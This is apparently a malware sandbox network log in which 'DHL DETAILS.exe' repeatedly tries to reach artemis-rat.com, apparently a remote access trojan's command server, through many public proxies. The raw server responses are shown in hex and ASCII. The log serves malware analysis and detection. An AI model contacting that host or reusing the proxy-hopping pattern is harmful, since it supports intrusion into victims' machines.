Mar 9, 2024 13:14:14.979820013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.394704103 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
662	192.168.2.5	52143	104.25.114.28	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.980397940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.135186911 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
663	192.168.2.5	51943	185.81.153.162	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.980483055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
664	192.168.2.5	52137	162.159.247.57	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.980885983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.142079115 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
665	192.168.2.5	52076	172.67.182.48	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.981940031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.136338949 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
666	192.168.2.5	51942	138.36.150.15	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.990628958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
667	192.168.2.5	52011	144.76.96.180	5566	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.993115902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.301839113 CET	729	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
668	192.168.2.5	51973	202.83.102.83	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.994468927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
669	192.168.2.5	52199	23.227.38.230	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.998043060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.152276993 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
670	192.168.2.5	52045	70.166.167.38	57728	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.011890888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
671	192.168.2.5	52037	198.105.100.156	6407	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.012125015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.423039913 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
672	192.168.2.5	52061	129.213.150.205	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.012135983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
673	192.168.2.5	52013	43.128.107.251	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.036786079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
674	192.168.2.5	52095	92.204.134.38	51123	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.038203955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.583071947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.334012032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.724430084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
675	192.168.2.5	51994	103.76.148.92	8181	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.038464069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.829123020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.974092960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.200162888 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
676	192.168.2.5	52027	106.14.255.124	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.038676977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.356607914 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
677	192.168.2.5	51504	162.223.94.164	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.097229958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.454325914 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:23 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
678	192.168.2.5	52232	104.25.234.81	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.104106903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.258636951 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
679	192.168.2.5	52207	142.4.123.41	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.105971098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
680	192.168.2.5	52042	58.234.116.197	8197	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.105978012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
681	192.168.2.5	52026	8.222.164.205	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.105978012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
682	192.168.2.5	52114	98.162.25.4	31654	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.106220961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
683	192.168.2.5	52119	98.162.25.29	31679	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.108153105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
684	192.168.2.5	52272	104.18.103.125	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.110749006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.265356064 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
685	192.168.2.5	51458	31.43.63.70	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.111157894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
686	192.168.2.5	51972	116.199.168.1	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
